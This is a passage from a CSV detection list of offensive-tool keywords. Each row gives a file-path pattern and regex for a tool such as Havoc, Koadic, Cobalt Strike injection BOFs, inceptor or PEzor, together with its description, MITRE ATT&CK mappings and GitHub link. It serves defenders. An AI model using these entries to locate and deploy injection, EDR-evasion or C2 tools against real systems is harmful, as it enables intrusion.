etc.","T1190 - T1210 - T1506 - T1061 - T1071 - T1100 - T1220","TA0001 - TA0002 - TA0003 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/BishopFox/Imperva_gzip_WAF_Bypass","1","1","N/A","N/A","2","150","29","2022-01-07T17:39:29Z","2022-01-07T17:38:33Z" "*/implant/callback*",".{0,1000}\/implant\/callback.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*/implant/elevate/*",".{0,1000}\/implant\/elevate\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/implant/register_cmd*",".{0,1000}\/implant\/register_cmd.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" 
"*/implants/*/Syscalls.*",".{0,1000}\/implants\/.{0,1000}\/Syscalls\..{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/ImplantSSP.exe*",".{0,1000}\/ImplantSSP\.exe.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*/impress-remote-discover.nse*",".{0,1000}\/impress\-remote\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/inceptor.git*",".{0,1000}\/inceptor\.git.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*/inceptor.git*",".{0,1000}\/inceptor\.git.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*/include/KaynStrike.h*",".{0,1000}\/include\/KaynStrike\.h.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","1","N/A","9","4","382","60","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z" "*/infection_monkey/*",".{0,1000}\/infection_monkey\/.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*/InflativeLoading.git*",".{0,1000}\/InflativeLoading\.git.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically 
convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","1","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*/InflativeLoading.py*",".{0,1000}\/InflativeLoading\.py.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","1","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*/InflativeLoading-main.zip*",".{0,1000}\/InflativeLoading\-main\.zip.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","1","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*/Infoga*",".{0,1000}\/Infoga.{0,1000}","offensive_tool_keyword","Infoga","Email Information Gathering.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/m4ll0k/Infoga","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" "*/informix-brute.nse*",".{0,1000}\/informix\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/informix-query.nse*",".{0,1000}\/informix\-query\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/informix-tables.nse*",".{0,1000}\/informix\-tables\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/inject.cpp*",".{0,1000}\/inject\.cpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation 
tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*/Inject/Dll/LoadDll*",".{0,1000}\/Inject\/Dll\/LoadDll.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*/Inject/PE/*.cs*",".{0,1000}\/Inject\/PE\/.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*/Inject/ShellCode/*.cs*",".{0,1000}\/Inject\/ShellCode\/.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*/injectAmsiBypass/*",".{0,1000}\/injectAmsiBypass\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectAmsiBypass","1","1","N/A","10","10","366","68","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z" "*/inject-assembly/*",".{0,1000}\/inject\-assembly\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","467","73","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" "*/injectEtw.*",".{0,1000}\/injectEtw\..{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectEtwBypass","1","1","N/A","10","10","271","54","2021-09-28T19:09:38Z","2021-09-21T23:06:42Z" "*/Injection/clipboard/*",".{0,1000}\/Injection\/clipboard\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Injection/conhost/*",".{0,1000}\/Injection\/conhost\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" 
"*/Injection/createremotethread/*",".{0,1000}\/Injection\/createremotethread\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Injection/ctray/*",".{0,1000}\/Injection\/ctray\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - 
T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Injection/dde/*",".{0,1000}\/Injection\/dde\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Injection/Injection.cna*",".{0,1000}\/Injection\/Injection\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Injection/kernelcallbacktable*",".{0,1000}\/Injection\/kernelcallbacktable.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - 
FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Injection/ntcreatethread*",".{0,1000}\/Injection\/ntcreatethread.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Injection/ntcreatethread/*",".{0,1000}\/Injection\/ntcreatethread\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - 
T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Injection/ntqueueapcthread*",".{0,1000}\/Injection\/ntqueueapcthread.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
